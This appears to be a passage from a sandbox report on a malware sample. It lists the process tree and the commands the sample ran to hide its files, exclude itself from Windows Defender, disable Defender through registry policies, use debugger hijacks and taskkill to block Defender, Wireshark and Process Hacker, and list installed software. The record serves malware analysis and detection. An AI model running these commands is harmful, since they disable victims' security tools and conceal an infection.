PID:1832
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:1744
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\oWsdf\MIJPw.class2⤵
- Views/modifies file attributes
PID:1928
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1068
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1296
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\oWsdf','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\oWsdf\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1944
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1980
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1972
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:2008
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2028
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1988
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:268
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1384
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1220
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1216
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1508
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1760
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1528
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1116
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1484
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:332
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1628
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1936
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1380
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1680
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1504
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:876
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1220
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1792
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1040
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:884
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:268
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:2036
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1852
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1160
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1992
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1984
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:812
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1888
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:888
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1460
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1372
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:652
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1992
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2008
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1772
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:748
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1680
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1896
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1376
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1372
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:1956
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1704
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:1188
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1752
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:1824
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1540
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1160
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:884
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1704
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:788
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1976
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:1788
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1940
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:556
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1312
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1784
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2008
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:1536
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:788
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:1788
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:876
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2000
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:1036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:812
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:1528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:1956
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1704
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:1460
-
-